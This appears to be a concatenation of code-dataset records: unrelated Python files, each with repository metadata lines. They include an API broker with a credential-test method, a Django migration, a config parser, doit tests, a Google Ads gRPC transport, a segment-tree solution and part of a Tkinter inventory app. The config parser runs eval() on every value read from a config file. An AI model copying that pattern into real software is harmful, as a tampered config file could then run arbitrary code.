:return service_description: The new authentication service description.
:rtype service_description: String
"""
return self.api_request(self._get_method_fullname("duplicate"), kwargs)
def auth_servers(self, **kwargs):
"""List all servers defined for the requested Authentication Service
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param id: The id of the authentication service to list the servers for
:type id: Integer
**Outputs**
"""
return self.api_request(self._get_method_fullname("auth_servers"), kwargs)
def auth_test_creds(self, **kwargs):
"""Test credentials for this service Authentication Servers that are stored in db.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param service_id: The id of the authentication service to test
:type service_id: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param username: The login of the user to test
:type username: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param password: The password of the user to test
:type password: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param nohtml: Convert output to simple text
:type nohtml: Boolean
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param id: The id of the session output file to display.
:type id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param read: Offset in bytes from the start of the file.
:type read: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return id: The id of the session output file.
:rtype id: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return read: Offset in bytes from the start of the file, to be used in the next auth_test_creds call, in order to retrieve the next lines of the output.
:rtype read: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return output: Result of the credential test.
:rtype output: String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return status: Status of the remaining output data to dump:
<br><dd> 0: if the dump of the credential test output is completed.
<br><dd> 1: if there is still output data to dump.
:rtype status: Integer
"""
return self.api_request(self._get_method_fullname("auth_test_creds"), kwargs)
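    # --- Illustrative usage sketch (not part of the generated broker) -----
    # A minimal example of paging through auth_test_creds() output via the
    # id/read/status fields documented above; the service id and credentials
    # are placeholders and the response is assumed to be a plain mapping.
    #
    #   resp = broker.auth_test_creds(service_id=3, username="jdoe",
    #                                 password="secret", nohtml=True)
    #   while True:
    #       print(resp["output"])
    #       if resp["status"] == 0:
    #           break
    #       resp = broker.auth_test_creds(id=resp["id"], read=resp["read"])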
| 45.21696
| 551
| 0.576273
|
8a77c01b8f406eac0194dde8ff68f36a1f189a7b
| 617
|
py
|
Python
|
forum/migrations/0027_c.py
|
shmilyoo/ggxxBBS
|
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
|
[
"MIT"
] | null | null | null |
forum/migrations/0027_c.py
|
shmilyoo/ggxxBBS
|
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
|
[
"MIT"
] | null | null | null |
forum/migrations/0027_c.py
|
shmilyoo/ggxxBBS
|
cef6408e533bd0b0f57c3e2f5da4e93ea07c4331
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('forum', '0026_a_b'),
]
operations = [
migrations.CreateModel(
name='C',
fields=[
('id', models.AutoField(serialize=False, primary_key=True)),
('name', models.CharField(default=b'', max_length=16)),
('time', models.DateTimeField(auto_now=True)),
],
options={
},
bases=(models.Model,),
),
]
| 23.730769
| 76
| 0.523501
|
c7b6ca60dd2bb29a50f7e726b0325d56cbd04d1d
| 2,322
|
py
|
Python
|
applications/FootballAction/train_lstm/scenario_lib/config.py
|
XYZ916829/PaddleVideo
|
8e422ee9fd4e08b711e80b7e9ff627c331f31c30
|
[
"Apache-2.0"
] | 5
|
2022-01-30T07:35:58.000Z
|
2022-02-08T05:45:20.000Z
|
applications/FootballAction/train_lstm/scenario_lib/config.py
|
liutinglong/PaddleVideo
|
6b8a723360ac652ca7aafa1908e6c67a67cf5ea5
|
[
"Apache-2.0"
] | null | null | null |
applications/FootballAction/train_lstm/scenario_lib/config.py
|
liutinglong/PaddleVideo
|
6b8a723360ac652ca7aafa1908e6c67a67cf5ea5
|
[
"Apache-2.0"
] | 1
|
2022-01-24T16:27:01.000Z
|
2022-01-24T16:27:01.000Z
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserve.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
from configparser import ConfigParser
except BaseException:
from ConfigParser import ConfigParser
import logging
CONFIG_SECS = [
'train',
'valid',
'test',
'infer',
]
def parse_config(cfg_file):
"""parse_config"""
parser = ConfigParser()
cfg = AttrDict()
parser.read(cfg_file)
for sec in parser.sections():
sec_dict = AttrDict()
for k, v in parser.items(sec):
try:
v = eval(v)
except BaseException:
pass
setattr(sec_dict, k, v)
setattr(cfg, sec.upper(), sec_dict)
return cfg
def merge_configs(cfg, sec, args_dict):
"""merge_configs"""
assert sec in CONFIG_SECS, "invalid config section {}".format(sec)
sec_dict = getattr(cfg, sec.upper())
for k, v in args_dict.items():
if v is None:
continue
try:
if hasattr(sec_dict, k):
setattr(sec_dict, k, v)
except BaseException:
pass
return cfg
def print_configs(cfg, mode):
"""print_configs"""
logger = logging.getLogger(__name__)
logger.info(
"---------------- {:>5} Arguments ----------------".format(mode))
for sec, sec_items in cfg.items():
logger.info("{}:".format(sec))
for k, v in sec_items.items():
logger.info(" {}:{}".format(k, v))
logger.info("-------------------------------------------------")
class AttrDict(dict):
"""AttrDict"""
def __getattr__(self, key):
return self[key]
def __setattr__(self, key, value):
if key in self.__dict__:
self.__dict__[key] = value
else:
self[key] = value
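if __name__ == "__main__":
    # Minimal illustrative sketch, not part of the original module. The file
    # name "football.ini" and the batch_size override are assumptions; the
    # file is assumed to exist and to contain a [train] section. Parse an
    # INI-style config, merge a dict of overrides into the TRAIN section,
    # then log every section.
    logging.basicConfig(level=logging.INFO)
    demo_cfg = parse_config("football.ini")
    demo_cfg = merge_configs(demo_cfg, "train", {"batch_size": 8})
    print_configs(demo_cfg, "Train")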
| 27.317647
| 74
| 0.594746
|
753c3e1d1006ffe29675a1567579dd3bea800956
| 675
|
py
|
Python
|
setup.py
|
thearn/github-auto-tools
|
ce9227a2407c45710a09e7a32eebf1568a068c92
|
[
"Apache-2.0"
] | 1
|
2020-07-16T17:26:11.000Z
|
2020-07-16T17:26:11.000Z
|
setup.py
|
silky/github-auto-tools
|
ce9227a2407c45710a09e7a32eebf1568a068c92
|
[
"Apache-2.0"
] | 4
|
2020-11-22T21:11:15.000Z
|
2020-11-29T15:33:16.000Z
|
setup.py
|
silky/github-auto-tools
|
ce9227a2407c45710a09e7a32eebf1568a068c92
|
[
"Apache-2.0"
] | 1
|
2016-06-04T09:19:51.000Z
|
2016-06-04T09:19:51.000Z
|
from setuptools import setup, find_packages
import sys, os
setup(name='github_clonetools',
version='0.1',
description="Command line tools to clone all github repos of a given account",
author='Tristan Hearn',
author_email='tristanhearn@gmail.com',
url='https://github.com/thearn/github-auto-tools',
license='Apache 2.0',
packages=['github_clonetools'],
include_package_data=True,
zip_safe=False,
entry_points={
'console_scripts':
['cloneall=github_clonetools.github_all:clone',
'clonerepos=github_clonetools.github_repo:clone',
'clonegists=github_clonetools.github_gists:clone']
}
)
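# --- Illustrative usage sketch (not part of setup.py itself) ---------------
# Once the package is installed, setuptools wires each console_scripts entry
# above to a shell command; the exact command-line arguments each script
# accepts are not shown here because they are defined elsewhere in the
# package.
#
#   $ pip install .
#   $ cloneall      # runs github_clonetools.github_all:clone
#   $ clonerepos    # runs github_clonetools.github_repo:clone
#   $ clonegists    # runs github_clonetools.github_gists:clone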
| 30.681818
| 82
| 0.69037
|
83bff45fb9ffa4c4e7cfe41932c8676163d74ec1
| 5,229
|
py
|
Python
|
tests/test_cmd_resetdep.py
|
m4ta1l/doit
|
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
|
[
"MIT"
] | 1,390
|
2015-01-01T21:11:47.000Z
|
2022-03-31T11:35:44.000Z
|
tests/test_cmd_resetdep.py
|
m4ta1l/doit
|
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
|
[
"MIT"
] | 393
|
2015-01-05T11:18:29.000Z
|
2022-03-20T11:46:46.000Z
|
tests/test_cmd_resetdep.py
|
m4ta1l/doit
|
d1a1b7b3abc7641d977d3b78b580d97aea4e27ea
|
[
"MIT"
] | 176
|
2015-01-07T16:58:56.000Z
|
2022-03-28T12:12:11.000Z
|
from io import StringIO
import pytest
from doit.cmd_resetdep import ResetDep
from doit.dependency import TimestampChecker, get_md5, get_file_md5
from doit.exceptions import InvalidCommand
from doit.task import Task
from tests.conftest import tasks_sample, CmdFactory, get_abspath
class TestCmdResetDep(object):
def test_execute(self, dep_manager, dependency1):
output = StringIO()
tasks = tasks_sample()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
cmd_reset._execute()
got = [line.strip() for line in output.getvalue().split('\n') if line]
expected = ["processed %s" % t.name for t in tasks]
assert sorted(expected) == sorted(got)
def test_file_dep(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "processed t2\n" == got
dep = list(my_task.file_dep)[0]
timestamp, size, md5 = dep_manager._get(my_task.name, dep)
assert get_file_md5(get_abspath("data/dependency1")) == md5
def test_file_dep_up_to_date(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
dep_manager.save_success(my_task)
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "skip t2\n" == got
def test_file_dep_change_checker(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
dep_manager.save_success(my_task)
dep_manager.checker = TimestampChecker()
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "processed t2\n" == got
def test_filter(self, dep_manager, dependency1):
output = StringIO()
tasks = tasks_sample()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
cmd_reset._execute(pos_args=['t2'])
got = output.getvalue()
assert "processed t2\n" == got
def test_invalid_task(self, dep_manager):
output = StringIO()
tasks = tasks_sample()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
pytest.raises(InvalidCommand, cmd_reset._execute, pos_args=['xxx'])
def test_missing_file_dep(self, dep_manager):
my_task = Task("t2", [""], file_dep=['tests/data/missing'])
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[my_task],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert ("failed t2 (Dependent file 'tests/data/missing' does not "
"exist.)\n") == got
def test_missing_dep_and_target(self, dep_manager, dependency1, dependency2):
task_a = Task("task_a", [""],
file_dep=['tests/data/dependency1'],
targets=['tests/data/dependency2'])
task_b = Task("task_b", [""],
file_dep=['tests/data/dependency2'],
targets=['tests/data/dependency3'])
task_c = Task("task_c", [""],
file_dep=['tests/data/dependency3'],
targets=['tests/data/dependency4'])
output = StringIO()
tasks = [task_a, task_b, task_c]
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=tasks,
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert ("processed task_a\n"
"processed task_b\n"
"failed task_c (Dependent file 'tests/data/dependency3'"
" does not exist.)\n") == got
def test_values_and_results(self, dep_manager, dependency1):
my_task = Task("t2", [""], file_dep=['tests/data/dependency1'])
my_task.result = "result"
my_task.values = {'x': 5, 'y': 10}
dep_manager.save_success(my_task)
dep_manager.checker = TimestampChecker() # trigger task update
reseted = Task("t2", [""], file_dep=['tests/data/dependency1'])
output = StringIO()
cmd_reset = CmdFactory(ResetDep, outstream=output, task_list=[reseted],
dep_manager=dep_manager)
cmd_reset._execute()
got = output.getvalue()
assert "processed t2\n" == got
assert {'x': 5, 'y': 10} == dep_manager.get_values(reseted.name)
assert get_md5('result') == dep_manager.get_result(reseted.name)
| 42.169355
| 81
| 0.605852
|
d92041b03487fbbcb917e572313bc66fef689c77
| 1,660
|
py
|
Python
|
node/util.py
|
martindale/OpenBazaar
|
620012832d614992d1097f66c75b24c1fa6648e5
|
[
"MIT"
] | null | null | null |
node/util.py
|
martindale/OpenBazaar
|
620012832d614992d1097f66c75b24c1fa6648e5
|
[
"MIT"
] | null | null | null |
node/util.py
|
martindale/OpenBazaar
|
620012832d614992d1097f66c75b24c1fa6648e5
|
[
"MIT"
] | 1
|
2020-07-15T05:03:34.000Z
|
2020-07-15T05:03:34.000Z
|
import os
import sys
import webbrowser
import platform
def is_mac():
os_name = platform.uname()[0]
return os_name == 'Darwin'
def open_default_webbrowser(url, protocol="http"):
"""
Open URL at the default browser.
@param url: The URL to open.
@type url: str
@param protocol: The internet protocol to use.
@type protocol: str
@return: True on success, False on failure.
@rtype: bool
"""
if not url.startswith(protocol):
# If protocol is absent from the url, attach it, otherwise
# the file `url` will be opened in Linux flavors.
full_url = "%s://%s" % (protocol, url)
else:
full_url = url
try:
success = webbrowser.open(full_url)
except webbrowser.Error:
success = False
print "[openbazaar:%s.%s] Could not open default web browser at %s" % (
"util",
"open_default_webbrowser",
url
)
return success
def osx_check_dyld_library_path():
"""This is a necessary workaround as you cannot set the DYLD_LIBRARY_PATH
by the time python has started."""
if not os.environ.get('DYLD_LIBRARY_PATH'):
print (
'WARNING: DYLD_LIBRARY_PATH not set, this might cause issues'
'\nwith openssl elliptic curve cryptography and other libraries.'
'\nIt is recommended that you stop OpenBazaar and set your'
'\nDYLD_LIBRARY_PATH environment variable as follows:'
'\n export DYLD_LIBRARY_PATH=$(brew --prefix openssl)/'
'lib:${DYLD_LIBRARY_PATH}'
'\nthen restart OpenBazaar.'
)
sys.exit(1)
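if __name__ == "__main__":
    # Minimal illustrative sketch, not part of the original module: the URL
    # below is an example value only. Opens it in the default browser using
    # the helper defined above and reports the result.
    opened = open_default_webbrowser("openbazaar.org")
    print("browser opened: %s" % opened)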
| 28.62069
| 79
| 0.61988
|
d51c28c810964e609fa0edbccaab5a931d8cfc80
| 10,114
|
py
|
Python
|
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
|
batardo/google-ads-python
|
a39748521847e85138fca593f3be2681352ad024
|
[
"Apache-2.0"
] | null | null | null |
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
|
batardo/google-ads-python
|
a39748521847e85138fca593f3be2681352ad024
|
[
"Apache-2.0"
] | null | null | null |
google/ads/googleads/v5/services/services/location_view_service/transports/grpc.py
|
batardo/google-ads-python
|
a39748521847e85138fca593f3be2681352ad024
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple
from google.api_core import grpc_helpers # type: ignore
from google.api_core import gapic_v1 # type: ignore
from google import auth # type: ignore
from google.auth import credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.ads.googleads.v5.resources.types import location_view
from google.ads.googleads.v5.services.types import location_view_service
from .base import LocationViewServiceTransport, DEFAULT_CLIENT_INFO
class LocationViewServiceGrpcTransport(LocationViewServiceTransport):
"""gRPC backend transport for LocationViewService.
Service to fetch location views.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
def __init__(
self,
*,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]): The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for grpc channel. It is ignored if ``channel`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._ssl_channel_credentials = ssl_channel_credentials
if channel:
# Sanity check: Ensure that channel and credentials are not both
# provided.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
elif api_mtls_endpoint:
warnings.warn(
"api_mtls_endpoint and client_cert_source are deprecated",
DeprecationWarning,
)
host = (
api_mtls_endpoint
if ":" in api_mtls_endpoint
else api_mtls_endpoint + ":443"
)
if credentials is None:
credentials, _ = auth.default(
scopes=self.AUTH_SCOPES, quota_project_id=quota_project_id
)
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
ssl_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
ssl_credentials = SslCredentials().ssl_credentials
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
ssl_credentials=ssl_credentials,
scopes=scopes or self.AUTH_SCOPES,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._ssl_channel_credentials = ssl_credentials
else:
host = host if ":" in host else host + ":443"
if credentials is None:
credentials, _ = auth.default(scopes=self.AUTH_SCOPES)
# create a new channel. The provided one is ignored.
self._grpc_channel = type(self).create_channel(
host,
credentials=credentials,
ssl_credentials=ssl_channel_credentials,
scopes=self.AUTH_SCOPES,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
self._stubs = {} # type: Dict[str, Callable]
# Run the base constructor.
super().__init__(
host=host, credentials=credentials, client_info=client_info,
)
@classmethod
def create_channel(
cls,
host: str = "googleads.googleapis.com",
credentials: credentials.Credentials = None,
scopes: Optional[Sequence[str]] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
scopes (Optional[Sequence[str]]): An optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
scopes=scopes or cls.AUTH_SCOPES,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def get_location_view(
self,
) -> Callable[
[location_view_service.GetLocationViewRequest],
location_view.LocationView,
]:
r"""Return a callable for the get location view method over gRPC.
Returns the requested location view in full detail.
Returns:
Callable[[~.GetLocationViewRequest],
~.LocationView]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_location_view" not in self._stubs:
self._stubs["get_location_view"] = self.grpc_channel.unary_unary(
"/google.ads.googleads.v5.services.LocationViewService/GetLocationView",
request_serializer=location_view_service.GetLocationViewRequest.serialize,
response_deserializer=location_view.LocationView.deserialize,
)
return self._stubs["get_location_view"]
__all__ = ("LocationViewServiceGrpcTransport",)
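# --- Illustrative usage sketch (not part of the generated transport) -------
# A minimal example of driving the transport directly, assuming Application
# Default Credentials are available; the customer id and location view id in
# the resource name are placeholders. In normal use the primary service
# client wraps this class, and real Google Ads API calls additionally need
# request metadata such as a developer token.
#
#   transport = LocationViewServiceGrpcTransport()
#   request = location_view_service.GetLocationViewRequest(
#       resource_name="customers/1234567890/locationViews/111222333",
#   )
#   view = transport.get_location_view(request)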
| 41.281633
| 90
| 0.6228
|
a439b267021d7c5df887c99d6d3d4c3e5e0da21f
| 4,797
|
py
|
Python
|
segment tree 2/2E.py
|
iammanish17/CodeforcesEdu
|
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
|
[
"MIT"
] | 6
|
2020-09-14T19:16:23.000Z
|
2021-12-10T19:07:51.000Z
|
segment tree 2/2E.py
|
iammanish17/CodeforcesEdu
|
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
|
[
"MIT"
] | null | null | null |
segment tree 2/2E.py
|
iammanish17/CodeforcesEdu
|
961543b332c773010320bd0b2e9d4a4b1c8dc0ea
|
[
"MIT"
] | 1
|
2021-08-12T19:37:22.000Z
|
2021-08-12T19:37:22.000Z
|
# By manish.17, contest: ITMO Academy. Segment Tree (part 2) - 2, problem: (E) Assignment and Minimum
# https://codeforces.com/profile/manish.17
import os
import sys
from io import BytesIO, IOBase
BUFSIZE = 8192
class FastIO(IOBase):
newlines = 0
def __init__(self, file):
self._fd = file.fileno()
self.buffer = BytesIO()
self.writable = "x" in file.mode or "r" not in file.mode
self.write = self.buffer.write if self.writable else None
def read(self):
while True:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
if not b:
break
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines = 0
return self.buffer.read()
def readline(self):
while self.newlines == 0:
b = os.read(self._fd, max(os.fstat(self._fd).st_size, BUFSIZE))
self.newlines = b.count(b"\n") + (not b)
ptr = self.buffer.tell()
self.buffer.seek(0, 2), self.buffer.write(b), self.buffer.seek(ptr)
self.newlines -= 1
return self.buffer.readline()
def flush(self):
if self.writable:
os.write(self._fd, self.buffer.getvalue())
self.buffer.truncate(0), self.buffer.seek(0)
class IOWrapper(IOBase):
def __init__(self, file):
self.buffer = FastIO(file)
self.flush = self.buffer.flush
self.writable = self.buffer.writable
self.write = lambda s: self.buffer.write(s.encode("ascii"))
self.read = lambda: self.buffer.read().decode("ascii")
self.readline = lambda: self.buffer.readline().decode("ascii")
sys.stdin, sys.stdout = IOWrapper(sys.stdin), IOWrapper(sys.stdout)
input = lambda: sys.stdin.readline().rstrip("\r\n")
from math import inf, log2
class LazySegmentTree:
def __init__(self, array, func=max):
self.n = len(array)
self.size = 2 ** (int(log2(self.n - 1)) + 1) if self.n != 1 else 1
self.func = func
self.default = 0 if self.func != min else inf
self.data = [self.default] * (2 * self.size)
self.lazy = [None] * (2 * self.size)
self.process(array)
def process(self, array):
self.data[self.size: self.size + self.n] = array
for i in range(self.size - 1, -1, -1):
self.data[i] = self.func(self.data[2 * i], self.data[2 * i + 1])
def push(self, index):
"""Push the information of the root to it's children!"""
if self.lazy[index] is None or 2 * index + 1 >= 2 * self.size:
    return
self.lazy[2 * index] = self.lazy[index]
self.lazy[2 * index + 1] = self.lazy[index]
self.data[2 * index] = self.lazy[index]
self.data[2 * index + 1] = self.lazy[index]
self.lazy[index] = None
def build(self, index, value):
"""Build data with the new changes!"""
index >>= 1
while index:
self.data[index] = self.func(self.data[2 * index], self.data[2 * index + 1]) if self.lazy[index] is None else self.lazy[index]
index >>= 1
def query(self, alpha, omega):
"""Returns the result of function over the range (inclusive)!"""
res = self.default
alpha += self.size
omega += self.size + 1
for i in reversed(range(1, alpha.bit_length())):
self.push(alpha >> i)
for i in range(len(bin(omega - 1)[2:]) - 1, 0, -1):
self.push((omega-1) >> i)
while alpha < omega:
if alpha & 1:
res = self.func(res, self.data[alpha])
alpha += 1
if omega & 1:
omega -= 1
res = self.func(res, self.data[omega])
alpha >>= 1
omega >>= 1
return res
def update(self, alpha, omega, value):
alpha += self.size
omega += self.size + 1
for i in reversed(range(1, alpha.bit_length())):
self.push(alpha >> i)
for i in reversed(range(1, omega.bit_length())):
self.push(omega >> i)
l, r = alpha, omega
while alpha < omega:
if alpha & 1:
self.data[alpha] = value
self.lazy[alpha] = value
alpha += 1
if omega & 1:
omega -= 1
self.data[omega] = value
self.lazy[omega] = value
alpha >>= 1
omega >>= 1
self.build(l, value)
self.build(r - 1, value)
n, m = map(int, input().split())
st = LazySegmentTree([0]*n, func=min)
for _ in range(m):
a = list(map(int, input().split()))
if a[0] == 1:
st.update(a[1], a[2]-1, a[3])
else:
print(st.query(a[1], a[2]-1))
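# Illustrative walkthrough (comment only, not part of the submission): for the input
#   5 3
#   1 0 3 3
#   2 1 2
#   2 3 5
# the tree starts as five zeros, "1 0 3 3" assigns 3 to indices 0..2, "2 1 2" prints the
# minimum of index 1 (3), and "2 3 5" prints the minimum over indices 3..4, which is still 0.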
| 33.545455
| 138
| 0.543673
|
d4a661f5d8a0b900ebf54dfd1e80945fe2156980
| 26,488
|
py
|
Python
|
Windows_Version.py
|
radonintro1234/inventory-tracking-system
|
df26907630a19cb10a720ad111173a381bd530ff
|
[
"MIT"
] | null | null | null |
Windows_Version.py
|
radonintro1234/inventory-tracking-system
|
df26907630a19cb10a720ad111173a381bd530ff
|
[
"MIT"
] | null | null | null |
Windows_Version.py
|
radonintro1234/inventory-tracking-system
|
df26907630a19cb10a720ad111173a381bd530ff
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
__version__ = "0.1.1 for Windows 10"
__author__ = "Rishi Mule, Shubham Mulik, Gaurav Gend, Vedant Padwal"
__license__ = 'MIT'
from tkinter import *
from tkinter import ttk
from tkinter import messagebox
from dbToCSV import toCSV
from csvToPdf import CsvtoPDF
from dialog import OptionDialog
import pymysql
import sqlite3
def create_database():
"""Function to create a Database"""
conn = sqlite3.connect('inventory.db')
cur = conn.cursor()
cur.execute("CREATE TABLE IF NOT EXISTS dmce_inventory (product_id text PRIMARY KEY , product_type text , model_no text , manufacturer text , department text , location text ,incharge text, comment text)")
conn.commit()
conn.close()
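# Illustrative sketch (comment only, not part of the original app; the sample row is
# hypothetical): the table created above can be exercised directly with sqlite3.
#   con = sqlite3.connect('inventory.db')
#   con.execute("insert into dmce_inventory values (?,?,?,?,?,?,?,?)",
#               ("PC-001", "DESKTOP", "HP-280", "HP", "COMPUTER", "LAB-1", "STAFF-A", "OK"))
#   con.commit()
#   con.close()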
#-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
class Inventory():
"""Creating a main window on Inventory"""
def __init__(self, root):
"""Default __INIT__ Function"""
self.root=root
self.root.title("I.T.S - For Datta Meghe College Of Engineering")
self.root.geometry("1200x660+160+80")
self.root.resizable(0, 0)
self.product_id_var = StringVar()
self.product_type_var = StringVar()
self.model_no_var = StringVar()
self.manufacturer_var = StringVar()
self.department_var = StringVar()
self.location_var = StringVar()
self.incharge_var = StringVar()
self.search_by_var = StringVar()
self.search_txt_var = StringVar()
head_title = Label(self.root,text="Inventory Tracking System",bd=10, relief=GROOVE, font=("ariel", 20 , "bold"), bg="RED", fg="white")
head_title.pack(side="top", pady=20, padx=10, fill=X)
#===================================================================================================================================
#===============================MANAGE_FRAME========================================================================================
#===================================================================================================================================
Manage_Frame=Frame(self.root, bd=5, relief=RIDGE, bg="crimson")
Manage_Frame.place(x=10, y=80, width=350, height=570)
m_title=Label(Manage_Frame,text="Manage Inventory", font=("", 20 , "bold"), bg="crimson", fg="white")
m_title.grid(row=0, columnspan=2, pady=20)
#------------------------------------------------------------------------------------------------------------------------------------
def caps(event):
"""Function to Convert Text To UPPERCAP"""
self.product_id_var.set(self.product_id_var.get().upper())
self.product_type_var.set(self.product_type_var.get().upper())
self.model_no_var.set(self.model_no_var.get().upper())
self.manufacturer_var.set(self.manufacturer_var.get().upper())
self.location_var.set(self.location_var.get().upper())
self.incharge_var.set(self.incharge_var.get().upper())
self.search_txt_var.set(self.search_txt_var.get().upper())
#------------------------------------------------------------------------------------------------------------------------------------
